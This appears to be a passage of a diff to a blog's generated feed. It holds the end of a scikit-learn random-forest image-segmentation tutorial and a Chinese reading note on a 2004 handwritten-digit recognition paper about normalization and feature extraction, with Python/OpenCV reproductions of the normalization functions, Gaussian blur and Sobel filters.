    dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

    # If you expect image and mask names to be the same this is where we can perform sanity check
    # dataset['Image_Name'].equals(dataset['Mask_Name'])
    # If we do not want to include pixels with value 0
    # e.g. Sometimes unlabeled pixels may be given a value 0.
    dataset = dataset[dataset.Label_Value != 0]

    # Assign training features to X and labels to Y
    # Drop columns that are not relevant for training (non-features)
    X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

    # Assign label values to Y (our prediction)
    Y = dataset["Label_Value"].values

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    • STEP 4: Define the classifier and fit a model with our training data
    1
    2
    3
    4
    5
    6
    7
    # Import training classifier
    from sklearn.ensemble import RandomForestClassifier
    # Instantiate model with n number of decision trees
    model = RandomForestClassifier(n_estimators = 50, random_state = 42)

    # Train the model on training data
    model.fit(X_train, y_train)
    • STEP 5: Accuracy check
    1
    2
    3
    4
    5
    from sklearn import metrics

    prediction_test = model.predict(X_test)
    # Check accuracy on test dataset.
    print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
    • STEP 6: SAVE MODEL FOR FUTURE USE
    1
    2
    3
    4
    5
    # You can store the model for future use. In fact, this is how you do machine elarning
    # Train on training images, validate on test images and deploy the model on unknown images.
    # Save the trained model as pickle string to disk for future use
    model_name = "sandstone_model"
    pickle.dump(model, open(model_name, 'wb'))
    ]]>
    @@ -8847,7 +8847,7 @@ /posts/Paper-Handwritten%20digit%20recognition-investigation%20of%20normalization%20and%20feature%20extraction%20techniques/ - 前言

    手写体数字识别——归一化特征提取技术研究

    论文

    题目

    Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques

    作者

    Cheng-LinLiu, Kazuki Nakashima, Hiroshi Sako, Hiromichi Fujisawa

    期刊来源

    Pattern Recognition

    出版日期

    2004-02

    期卷

    37 (2004) 265 – 279

    Abstract

    ​ 在开发字符识别系统(developing character recognition system)中,各种性能的评估(the performance evaluation)对选择正确的方案(select the correct options)至关重要。

    ​ 之前的工作中,我们提出了长宽比自适应归一化(aspect ratio adaptive normalization, ARAN),并评估了最先进的**特征提取(state-of-the-art feature extraction)分类技术(classification techniques)**的性能(performance)。

    ​ 这一次我们提出了一些改进的归一化函数(improved normalization functions)方向特征提取策略(direction feature extraction strategies),并将其与现有技术进行性能方面的比较。

    ​ 我们比较了三个不同数据源中(three distinct data sources):

    • 10 个归一化函数(normalization functions)
      • 7 个基于 dimensions
      • 3 个基于 moments
    • 8 个特征向量

    ​ 将归一化函数和特征向量结合起来,对每个数据集(each dataset)产生 80 个分类正确率(eighty classification accuracies)。

    归一化函数的比较表明,基于 dimensions 的归一化函数的性能优于基于 moments 的归一化函数,而且纵横比映射(aspect ratio mapping)是流畅(influential)的。

    特征向量的比较表面,改进后的特征提取策略(improved feature extraction strategies)优于基线策略(baseline counterparts)

    ​ 灰度图像(gray-scale image)中的梯度特征(gradient feature)表现最好,改进的 **NCFE(normalization-cooperated feature extraction)**特征也表现良好。

    归一化(normalization)、**特征提取(feature extraction)分类(classification)**的结合在知名数据集上产生了非常高的精度。

    1 Introduction

    • **Optical character recognition(OCR)**光学字符识别
    • Character recognizer 字符识别器,包括以下任务:
      • pre-processing 预处理
        • 归一化图像(normalized image)的大小(size)和纵横比(aspect ratio)
        • 像素值(pixel values)的插值技术(interpolation technique)
      • feature extraction 特征提取
      • classification 分类
        • 参数(parametric)和非参数(nonparametric)统计分类(statistical classifiers)
        • 神经网络(neural networks)
        • 支持向量机(support vector machines, SVMS)
        • 混合分类器(hybrid classifiers)

    ​ 对于 pre-processing,我们已经证明了字符图像的归一化对识别性能有重要的影响,提出了长宽比自适应归一化(ARAN)策略来提高识别性能。


    ​ 对于 feature extraction,重点研究了 ARAN 实现的多样性(the diversity of implementation)和方向特征提取(direction feature extraction)。

    ​ ARAN 的性能取决于纵横比映射函数(aspect ratio mapping function)。

    ​ direction feature 是 character recognition 中最常用的特征。其性能在很大程度上取决于特征的表示(representation of feature)和提取技术(extraction technique)。

    ​ 特征向量表示表示链码(chaincodes)或梯度(gradients)的方向分布。

    ​ 新的特征向量旨在提高 NCFE(normalization-cooperated feature extraction)的性能。


    Normalization 被认为是字符识别中最重要的预处理因素。

    ​ 通常,字符图像通过**插值(interpolation)/ 外推(extrapolation)线性映射(linearly mapped)**到一个标准平面上。

    ​ 通过线性映射,除了纵横比变化外,字符形状不会变形。

    • **透视变换(perspective transformation)**试图纠正字符宽度的不平衡。

    • 矩归一化(moment normalization) 试图纠正旋转或倾斜(slant)。

    • **非线性归一化(nonlinear normalization)**用于均衡线密度(equalize the line density)。

    • **倾斜归一化(slant normalization)**可以通过上下文(context)来估计,而不是 moments。


    Feature extraction 是字符识别的核心。

    • 局部行程方向分布(distribution of local stroke direction)(direction feature)用于其高性能和易于实现而被广泛应用。

    • **局部描边方向(local stroke direction)**可以通过:

      • skeleton 骨骼

      定义:对于给定的文字图像,找出其骨架(Skeleton)线的处理称为细化处理。

      作用:骨架线指文字图像线宽的中心线,其宽度为 1 bit。失去了笔画宽度信息,但保留了文字结构信息,有利于笔画特征的提取,是提取结构特征的基础。

      • chaincode 链码
      • gradient 梯度

      来测量。

    • chaincode feature 被广泛采用

    • gradient feature 适用于灰度图像和二值图像。

    • 为了增强方向特征的识别能力,提出了一些互补特征(complementary features):如

      • structural and curvature feature(结构特征和凹面特征)
      • profile shape feature(廓形特征)
      • curvature feature(曲率特征)

    ​ 另一方面,所谓的归一化协同特征提取(normalization-cooperated feature extraction, NCFE)方法是从归一化图像之外的原始图像提取方向特征。


    ​ 我们之前评估了手写字符识别中的一些统计(statistical)和神经分类器(neural classifiers),并发现一些分类器在低复杂度下具有很高的准确性。

    ​ SVM 在分类精度方面具有优势,但计算成本非常高。

    ​ 为了测试归一化(normalization)和特征提取技术(feature extraction techniques)的性能,我们使用了三个具有较高精度的分类器:

    • 多项式分类器(polynomial classifier)
    • 判别学习二次判别函数(discriminative learning quadratic discriminant function, DLQDF)
    • 径向基函数核(SVC-rbf)支持向量分类

    • $8$ 个特征向量
      • 基本特征类型(basic feature types)
        • chaincode feature 链码特征
        • profile shape feature 廓型特征
        • NCFE 特征
        • gradient feature 梯度特征
      • 对 NCFE 的两种改进版本:
        • enhanced NCFE with profile shape feature 增强的 NCFE 与轮廓形状特征
        • 连续 NCFE

    • $3$ 个数据库
      • CENPARMI
      • NIST
      • Hitachi

    ​ 基于 $10$ 个归一化函数 和 $8$ 个特征向量的组合给出了 $80$ 个 classification accuracies。

    ​ 此外,每个特征向量根据方向的分辨率有两种变化:$4$ 个方向和 $8$ 个方向,分别评估。


    ​ 文章结构:

    • 第 2 节描述了规范化策略;
    • 第 3 节描述了特征提取技术;
    • 第 4 节给出实验结果;
    • 第 5 节给出结论。

    2 Normalization techniques

    2.1 Implementation of normalization 归一化的实施

    ​ 为了便于特征提取和分类,归一化图像平面(标准平面)的 $x/y$ 维数(大小)是固定的。

    ​ 然而,在纵横比自适应归一化(ARAN)中,标准平面的维度不一定是填充的。

    ​ 根据纵横比,归一化图像以一维填充的平面为中心。
    假设标准平面为正方形,边长用 $L$表示。将归一化字符图像的宽度和高度分别表示为 $W_2$ 和 $H_2$,纵横比定义为

    $$R_2=\left{\begin{matrix}
    W_2/H_2, \mathrm{if}\ W_2<H2\H_2/W_2,\mathrm{otherwise.}
    \end{matrix}\right.$$

    ​ 如果归一化图像填充一维,则 $\max(W_2, H_2) = L$。但是,在字符图像质心对准标准平面中心的矩归一化中,归一化图像不一定填充一维,可能会超出标准平面。在这种情况下,$W_2$和 $H_2$ 不由 L 决定,将标准平面外的图像部分截断。


    ​ 在 ARAN 的实现中,将规范化的字符图像填充到另一个尺寸为 $W_2 \times H_2$ 的柔性平面中,然后通过对齐边界或质心将该柔性平面平移至与标准平面重叠。
    ​ 在下面,我们将演示如何将大小为 $W_1 \times H1$ 的字符图像转换为大小为 $W_2 \times H_2$ 的规范化图像。转换可以通过正向映射或反向映射来完成。
    将原图像和归一化后的图像分别表示为 $f(x, y)$ 和 $g(x’, y’)$,归一化后的图像由 $g(x’, y’) = f(x, y)$ 基于坐标映射生成。
    ​ 正向映射(forward mapping)和反向映射(backward mapping)由 $x’=x’(x,y),y’=y’(x,y)$ 和 $x=x(x’,y’),y=y(x’,y’)$分别给出。

    ​ 我们描述各种归一化方法的坐标映射(coordinate mapping of various of various normalization methods),然后解决像素的插值问题(interpolation of pixels)。

    • 线性归一化(linear normalization)
    • 矩归一化(moment normalization)
    • 斜归一化(slant normalization)
    • 非线性归一化(nonlinear normalization)

    的正向映射(forward mapping)和反向映射见表1。

    Coordinate mapping of various normalization methods
    各种归一化方法的坐标映射
    MethodForward mappingBackward mapping
    Linear$x’=\alpha x$
    $y’=\beta y$
    $x=x’/\alpha$
    $y=y’/\beta$
    Moment$x’=\alpha (x-x_c)+x’_c$
    $y’=\beta (y-y_c)+y’_c$
    $x=(x’-x’_c)/\beta+x_c$
    $y=(y’-y’_c)/\beta+y_c$
    Slant$x’=x-(y-y_c)\tan\theta$
    $y’=y$
    $x=x’-(y+y_c)\tan\theta$
    $y=y’$
    Nonlinear$x’=W_2h_x(x)$
    $y’=H_2h_y(y)$
    $x=h_x{-1}(x’/W_2)$<br/>$y=h_y{-1}(y’/H_2)$
    • 其中,$\alpha$ 和 $\beta$ 表示变化比(ratios of transformation):

      • $\alpha=W_2/W_1$

      • $\beta=H_2/H_1$

    • moment normalization 是指不旋转的线性变换,归一化图像的中心和大小由矩决定。

    • 在基于 moments 的 slant normalization,倾斜角度由二阶矩计算:

      • $\tan\theta=\frac{\mu_{11}}{\mu_{02}}$
      • 其中,$\mu_{pq}=\sum_x\sum_y(x-x_c)p(y-y_c)qf(x,y)$(中心距)
    • 对于 nonlinear normalization,$h_x$ 和 $h_y$ 表示归一化后的累计线密度直方图(line density histograms)。

    • 在 forward mapping 中,$x$ 和 $y$ 是离散的,但 $x’(x,y)$ 和 $y’(x,y)$ 不一定是离散的。

    • 在 backward mapping 中,$x’$ 和 $y’$ 是离散的,但 $x(x’,y’)$ 和 $y(x’,y’)$ 不一定是离散的。

    • 在 forward mapping 中,所映射的坐标表示 $(x’,y’)$ 不一定填满归一化平面中的所有像素。因此在实现归一化时,需要进行坐标离散(coordinate discretization)或像素插值(pixel interpolation)


    ​ 所有(original)字符图像都具有二值灰度(binary gray levels)。

    ​ 我们使用坐标离散化(coordinate discretization)生成二进制归一化图像(binary normalized images)。

    ​ 使用像素插值(pixel interpolation)生成灰度归一化图像(gray-scale normalized images)。

    • 通过 discretization,映射的坐标 $(x’,y’)$ 或 $(x,y)$ 近似为最接近的整数 $([x’],[y’])$ 或 $([x],[y])$
    • 在 the discretization of backward mapping 中,离散坐标 $(x’,y’)$ 扫描归一化后的像素平面和灰度 $f([x],[y])$ 分配给 $g(x’,y’)$。
    • 在 discretization of forward mapping 中,离散坐标 $(x,y)$ 扫描原始图像的像素,灰度 $f(x,y)$ 被赋给从 $([x’(x)],[y’(y)])$ 到 $([x’(x+1)],[y’(y+1)])$。

    ​ 在反向映射生成灰度图像的插值(interpolation of backward mapping for generating gray-scale)中:

    • 映射位置(mapped position)$(x,y)$ 被四个离散的像素包围。
      • 灰度 $g(x’,y’)$ 是四个像素值的加权组合。

    ​ 在前向映射插值生成灰度图像时,将原图像和归一化图像中的每个像素看作一个单位面积的平方。
    ​ 通过坐标映射,将原图像的单位正方形映射到归一化平面上的矩形。

    jpg

    ​ 如图所示,在归一化平面中,每个与矩形重叠的单元正方形都被赋予与重叠面积成比例的灰度。

    2.2 Aspect radio mapping 纵横比映射

    ​ 为了实现归一化,需要确定归一化图像的宽度 $W_2$ 和高度 $H_2$。我们假设 $\max(W_2,H_2)$ 等于标准平面的边长 $L$。而 $\min(W_2,H_2)$由$R_2=\left{\begin{matrix}
    W_2/H_2, \mathrm{if}\ W_2<H2\H_2/W_2,\mathrm{otherwise.}
    \end{matrix}\right.$ 中的纵横比决定,归一化后的图像纵横比与原始图像的纵横比相适应。因此长宽比映射函数决定了归一化图像的大小和形状。

    • 基于 dimension 的归一化,以实际图像的宽度和高度作为尺寸。

    • 基于 moment 的归一化,

      • 原始图像的重心被设为中心点
      • 边界被重新设置为 $[x_c-2\sqrt{\mu_{20}},x_c+2\sqrt{\mu_{20}}]$ 和 $[y_c-2\sqrt{\mu_{02}},y_c+2\sqrt{\mu_{02}}]$
      • 尺寸被重新设置为 $W_1=4\sqrt{\mu_{20}}$ 和 $H_1=4\sqrt{\mu_{02}}$
        • 其中,$\mu_{pq}=\sum_x\sum_y(x-x_c)p(y-y_c)qf(x,y)$

      图像的矩归一化是图像预处理的一种方法,相对于直接的线性归一化,矩归一化的优势在于它利用了图像的矩信息,将原图像归一化到幕布大小的同时使得原图的中质心与幕布的中心对齐,同时尽可能的去除了原图中的边界区域(margin)。图像矩归一化_夜半罟霖的博客-CSDN博客_图像矩阵归一化

      图像平面被扩展或修建,以便适应在范围内。

      • 计算原始图像的纵横比:$R_1=\left{\begin{matrix}
        W_1/H_1, \mathrm{if}\ W_1<H_1\H_1/W_1,\mathrm{otherwise.}
        \end{matrix}\right.$
    • 改变归一化策略和纵横比映射函数,10 个归一化函数如下所示。

    序号描述公式
    $F0$固定长宽比(拉伸)$R_2=1$
    $F1$保留长宽比$R_2=R_1$
    $F2$长宽比的平方根$R_2=\sqrt{R_1}$
    $F3$长宽比的立方根$R_2=\sqrt[3]{R_1}$
    $F4$分段线性长宽比$R_2=\left{\begin{matrix} 0.25+1.5R_1, \mathrm{if}\ R_1<0.5\1,\mathrm{otherwise.}\end{matrix}\right.$
    $F5$长宽比的正弦值的平方根$R_2=\sqrt{\sin\left(\frac{\pi}{2}R_1\right)}$
    $F6$$F5$ 的 nonlinear 归一化,线密度直方图计算采用的方法
    $F7$保留长宽比的 moment 归一化
    $F8$长宽比平方根的 moment 归一化
    $F9$长宽比立方根的 moment 归一化

    ​ $F0$-$F5$如图所示,其中 $F4$、$F5$ 优于 $F0$。

    jpg

    ​ 所有的归一化函数都是通过正向映射来实现的。图 3 为归一化函数对应的同一原始图像。

    jpg

    ​ 图 4 为对应的同一原始图像和归一化后的二值图像和灰度图像。

    jpg

    ​ 标准归一化平面尺寸为 $35\times 35$,当归一化图像的长宽比与原始长宽比偏离较大时,字符形状的变形也是相当大的。(如 $F0$ 和 $F5$)

    ​ 对于基于矩的归一化($F7$,$F8$ 和 $F9$),归一化图像在中心点居中,标准平面的任何维度都不被填充。


    ​ 使用 Python 尝试代码复现 $F0$ - $F5$:

    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    img.shape
    (76, 35)
    H2 = 35
    W2 = 35


    def R1(img):
    if img.shape[0] < img.shape[1]:
    return img.shape[0] / img.shape[1]
    else:
    return img.shape[1] / img.shape[0]


    def F0(img):
    ans = cv2.resize(img, (H2, W2))
    return ans


    def F1(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F2(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2 - ans.shape[0]) / 2), (H2 - ans.shape[0]) // 2,
    (W2 - ans.shape[1]) // 2, round((W2 - ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


    def F3(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** (1 / 3))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** (1 / 3)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F4(img):
    if R1(img) >= 0.5:
    return F0(img)
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (R1(img) * 1.5 + 0.25))))
    else:
    ans = cv2.resize(img, (round(H2 * (R1(img) * 1.5 + 0.25)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F5(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (sin(R1(img) * np.pi / 2)) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans
    fig = plt.figure(figsize=(9, 3))

    ax = fig.add_subplot(1, 6, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')
    for i in range(6):
    if i < 5:
    p = i + 2
    else:
    p = i + 3
    exec("ax" + str(i) + "=fig.add_subplot(2, 6, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(i) + ".imshow(F" + str(i) + "(img), cmap='gray')")
    exec("ax" + str(i) + ".title.set_text('F" + str(i) + "')")
    plt.show()

    png

    3 Feature extraction techniques 特征提取技术

    • 我们提取了三种类型的方向特征:

    • 根据是否使用 slant normalization,chaincode feature 有两种变换。

    • 对于 chaincode feature 和 gradient feature extraction,将归一化后的图像分解为 $4$ 个方向平面或 $8$ 个方向平面。

    • 在 NCFE 中,原始图像的边缘像素直接映射到 $4$ 向或 $8$ 向平面上。

    • 对于 feature measuring,将每个特征平面(feature plane)划分为均匀的区域(uniform zones),并将每个区域的强度累积为一个测量值,或将模糊掩膜(blurring masks)与该平面进行卷积以给出测量值。

    • 带模糊掩膜的卷积相当于低通滤波(low-pass filtering)和采样(sampling)。通常,使用高斯掩膜:$h(x,y)=\frac{1}{2\pi \sigma2_x}\exp\left(-\frac{x2+y2}{2\sigma2_x}\right)$

      • 其中 $\sigma_x$ 与模糊掩膜之间的间隔有关,可以看作是采样间隔(sampling interval),是采样频率的倒数(the reciprocal of sampling frequency)。

        经验公式 $\sigma_x=\frac{\sqrt 2t_x}{\pi}$

        • 其中 $t_x$ 是 $x$ 轴和 $y$ 轴模糊蒙版(blurring masks)
      • 在中心 $(x_0,y_0)$ 的模糊掩膜,卷积给出了一个测量值:$F(x_0,y_0)=\sum_x\sum_yf(x,y)h(x-x_0,y-y_0)$

    使用 Python 复现高斯掩膜:

    img_f = cv2.GaussianBlur(img, (7, 7), -1)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_f = fig.add_subplot(1, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_f.imshow(img_f, cmap='gray')
    ax_f.title.set_text('GaussianBlur')

    plt.show()

    png

    • 在 chaincode feature extraction 中,将归一化图像的轮廓赋给 $8$ 方向码:

      jpg

      并将每个方向的轮廓像素赋给相应的方向平面。链码的分配可以在图像的光栅扫描(raster scan of the image)中完成,无需轮廓跟踪(contour tracing)。在这个过程中,一个具有多个连接的像素可以被分出多个 chaincodes。若要提取 $4$ 方向特征,则将每对相反方向的平面合并为一个特征平面,并对 $4$ 个平面进行模糊处理。


    • 对于 NCFE,原始图像中的每一个 chaincode 都被视为是一个线段,该线段被映射到标准平面方向平面上的另一个线段。

    • 在 direction plane 上,每个与线段在主方向($x$ 或 $y$)上相交的网格单元都被赋予了一个方向贡献单位。

    • 由于线段对网格单元的覆盖不是离散的,我们在此提出了一种基于连续特征平面的改进的 NCFE 方法。

    • 在 continuous plane 上,像素被视为一个正方形,方向长度与落在这个正方形中的线段长度成正比。

    jpg

    • 如图 6 所示,从链码映射的线段覆盖了 4 个单元 A、B、C、D。
      • 通过离散的 NCFE,$A$ 和 $C$ 被分配成一个一个方向单元。
      • 通过连续的 NCFE,所有 $4$ 个单元都被分配与单元线段长度成比例的方向强度。
    • 注意,对于 NCFE,有时平滑字符图像是必要的,以便 chaincode 更好地解释笔画方向。

    ​ gradient feature extraction 中,采用 Sobel 算子计算梯度的 $x/y$ 分量。将梯度图像分解为 4 个方向平面或 8 个方向平面。其他学者也使用 Roberts 算子和 Kirsh 算子。

    jpg

    ​ 梯度 $\mathbf{g}(x,y)=[g_x,g_y]^T$,位置 $(x,y)$:

    • $g_x(x,y)=f(x+1,y-1)+2f(x+1,y)+f(x+1,y+1)-f(x-1,y-1)-2f(x-1,y)-f(x-1,y+1)$

    • $g_y(x,y)=f(x-1,y+1)+2f(x,y+1)+f(x+1,y+1)-f(x-1,y-1)-2f(x,y-1)-f(x+1,y-1)$

    使用 Python 复现 Sobel masks:

    kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
    kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
    img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
    img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_x = fig.add_subplot(2, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_x.imshow(img_x, cmap='gray')
    ax_x.title.set_text('x')

    ax_y = fig.add_subplot(2, 2, 4)
    plt.xticks([])
    plt.yticks([])
    ax_y.imshow(img_y, cmap='gray')
    ax_y.title.set_text('y')

    plt.show()

    png


    ​ 梯度强度和方向可以从向量 $[g_x,g_y]^T$ 得出.对于字符特征提取,计算归一化图像上每个像素的梯度。梯度方向的范围被划分为若干个区域(比如 $8$ 个或 $16$ 个),每个区域对应一个方向平面。每个像素被分配到一个方向区域,梯度强度贡献相应平面的强度。然而,在我们的实验中,我们采用了另一种策略,即将每个梯度向量分解为标准方向上的分量。

    ​ 该策略曾用于在线字符识别的特征提取。我们将梯度向量分解成八个链码方向。如果梯度方向位于两个标准方向之间,则在两个标准方向上分解为两个分量,如图 8。

    jpg

    ​ 梯度特征可以从二进制或灰度归一化图像中提取。从一个二值字符图像,灰度归一化图像是通过前向二值到灰度像素映射生成的。我们也称这种方法生成的灰度图像为伪灰度图像。伪灰色图像的梯度特征是对二值图像梯度特征的改进。


    ​ 为了增强方向特征的识别能力,我们将结构特征和形状特征作为互补特征。结构特征表示为水平交叉计数,而形状特征表示为最外边缘与凸包之间的距离。交叉计数和距离序列也通过一维高斯掩模进行模糊处理,以给出特征测量。由于归一化平面设置为 $35 \times 35$ 像素,序列的长度为 $35$。我们提取了 $11$ 个模糊的水平交叉计数和 $22$ 个(左和右)正面形状测量。这些测量值被添加到模糊链码特征中,以形成增强的特征向量。


    ​ NCFE 功能还可以通过补充功能来增强。采用 NCFE 方法计算交叉计数和轮廓形状距离,并将其映射到标准平面上。然后,它们被模糊,以给出 $11 + 22$ 个测量值,以添加到 NCFE 方向特征中。增强的 NCFE 特征以及连续的 NCFE 特征可以被视为对现有 NCFE 方法的改进。


    ​ 在我们的实验中,我们测试了八个方向特征或增强的特征向量。每个特征向量有 4 个方向和 8 个方向。
    特征向量如下所示。

    特征向量描述$4$ 方向$8$ 方向
    blrblurred chaincode feature,在每个特征平面上,均匀放置 $5×5$ 高斯掩模来计算 $25$ 个测量值。100D200D
    desdeslant chain feature,对原始图像进行去噪和归一化,提取链码特征。100D200D
    mulenhanced chaincode feature with complementary(互补的)features.133D233D
    ncfdiscrete NCFE direction feature.100D200D
    ncf-pdiscrete NCFE direction feature plus complementary features.133D233D
    ncf-ccontinuous NCFE direction feature.100D200D
    grdgradient feature from binary images(二值图像的梯度特征).100D200D
    grd-ggradient feature from pseudo gray-scale images(伪灰度图像的梯度特征).100D200D

    ​ 为了修改特征分布以提高分类性能,对特征向量中的所有测量值进行变量变换 $y=x^p$。这个变换也被称为 Box-Cox 变换。为了计算方便,我们在实验中没有对功率参数进行优化,而是设置为 $p=0.5$。

    4 Experimental results

    4.1 Reults on CENPARMI database

    ​ CENPARMI (加拿大康科迪亚大学)的手写数字数据库包含 6000 张数字图像(10 个班级各 600 张图像),从美国邮政的实时邮件中收集,扫描为 166DPI。
    ​ 在数据库中,4000 张图像被指定用于训练,剩下的 2000 张图像用于测试。


    ​ 使用了两种分类:

    • 多项式分类器 polynomial classifier(PC)
    • 径向基函数核支持向量分类器 support vector classifier with radial basis function kernel(SVC-rbf)

    $$RPM=\frac{100AER}{\min(AER)}$$

    其中 $AER$ 表示平均错误率。

    $RPM$ 的倒数对应 ratio of error rate between the best method and an alternative method.

    • 当 ratio of error rate $\ge0.9$ 时(对应的 $RPM\le111.1$),我们认为备选方法 competitive to the best one。
    • 当 ratio of error rate $\ge0.8$ 时(对应的 $RPM\le125$),我们认为备选方法 is good。
    • 当 $0.7\le$ ratio of error rate $<0.8$ 时($125<RPM\le142.9$),我们认为备选方法 is fair。
    • ratio of error rate $<0.7$($RPM>142.9$)说明替代方法性能较差。

    ​ $F0$,$F2$,$F4$,$F9$ 表现最好,保留纵横比的 $F1$ 和 $F7$ 效果较差。

    4.2 Results on NIST database

    ​ 我们利用 NIST 特殊数据库19 (SD19)的光盘制作了一个实验数据库。训练数据集由600位作者的数字样本组成。(no.0–399 and no.2100 –2299),测试数据集由400位作者的数字样本组成。(no.500–699 andno.2400 –2599)。训练数据集和测试数据集的样本总数分别为66,274和45,398。图像以300DPI扫描。
    ​ NIST数据库的字符图像存在大量的轮廓噪声,因此对 NCFE 进行平滑是必要的。
    ​ 在NIST数据库的识别中采用

    • 多项式分类器 polynomial classifier(PC)

    • 判别学习二次判别函数(DLQDF)两类方法。


    • 特征向量 decgrd-g 在四种表现最好。
    • ncf-pncf-c 相对于 ncf 优势明显。

    4.3 Results on Hitachi database

    ​ 为了测试对日立公司收集的数据库对日文字体的识别性能。样本采集自样本表和真实表格(保险申请、银行交易等)图像,扫描精度为 200DPI。训练数据集包含 164,158 个样本,我们用这些样本来训练具有 80 个主成分的 PC。


    • $F0$,$F2$,$F3$,$F4$,$F5$,$F9$ 表现最好,保留纵横比的 $F1$ 和 $F7$ 效果较差。
    • des 的性能较差,可能是因为在日语风格写作中,数字图像的倾斜度并不大。

    4.4 Speed of feature extraction

    ​ $8$ 方向特征要比 $4$ 方向特征花费更多时间。

    ​ $F6$ 要花费更多时间。

    5 Conclusion

    ​ 我们在不同来源的大型数据库上比较了十个归一化函数和八个特征向量在手写数字识别中的性能。标准化函数实现了基于维度的线性/非线性标准化和具有变化纵横比映射的基于度量的标准化。识别结果表明,矩归一化函数F8和F9的分类精度最高。纵横比映射对基于维度和基于矩的归一化的识别性能都有影响。

    心得

    ​ 这是一篇关于文字识别的论文,主要讲述了文字识别中,对文字图像数据的处理中归一化和特征提取方面的内容。我尝试对论文中的部分内容进行代码复现,在看论文和代码复现的过程中,学习到了不少数字图像处理方面的知识,了解到了一些新概念——链码,图像的重心,图像的矩等。通过特征工程,以提高在机器学习中的准确率。

    ]]>
    + 前言

    手写体数字识别——归一化特征提取技术研究

    论文

    题目

    Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques

    作者

    Cheng-LinLiu, Kazuki Nakashima, Hiroshi Sako, Hiromichi Fujisawa

    期刊来源

    Pattern Recognition

    出版日期

    2004-02

    期卷

    37 (2004) 265 – 279

    Abstract

    ​ 在开发字符识别系统(developing character recognition system)中,各种性能的评估(the performance evaluation)对选择正确的方案(select the correct options)至关重要。

    ​ 之前的工作中,我们提出了长宽比自适应归一化(aspect ratio adaptive normalization, ARAN),并评估了最先进的**特征提取(state-of-the-art feature extraction)分类技术(classification techniques)**的性能(performance)。

    ​ 这一次我们提出了一些改进的归一化函数(improved normalization functions)方向特征提取策略(direction feature extraction strategies),并将其与现有技术进行性能方面的比较。

    ​ 我们比较了三个不同数据源中(three distinct data sources):

    • 10 个归一化函数(normalization functions)
      • 7 个基于 dimensions
      • 3 个基于 moments
    • 8 个特征向量

    ​ 将归一化函数和特征向量结合起来,对每个数据集(each dataset)产生 80 个分类正确率(eighty classification accuracies)。

    归一化函数的比较表明,基于 dimensions 的归一化函数的性能优于基于 moments 的归一化函数,而且纵横比映射(aspect ratio mapping)是流畅(influential)的。

    特征向量的比较表面,改进后的特征提取策略(improved feature extraction strategies)优于基线策略(baseline counterparts)

    ​ 灰度图像(gray-scale image)中的梯度特征(gradient feature)表现最好,改进的 **NCFE(normalization-cooperated feature extraction)**特征也表现良好。

    归一化(normalization)、**特征提取(feature extraction)分类(classification)**的结合在知名数据集上产生了非常高的精度。

    1 Introduction

    • **Optical character recognition(OCR)**光学字符识别
    • Character recognizer 字符识别器,包括以下任务:
      • pre-processing 预处理
        • 归一化图像(normalized image)的大小(size)和纵横比(aspect ratio)
        • 像素值(pixel values)的插值技术(interpolation technique)
      • feature extraction 特征提取
      • classification 分类
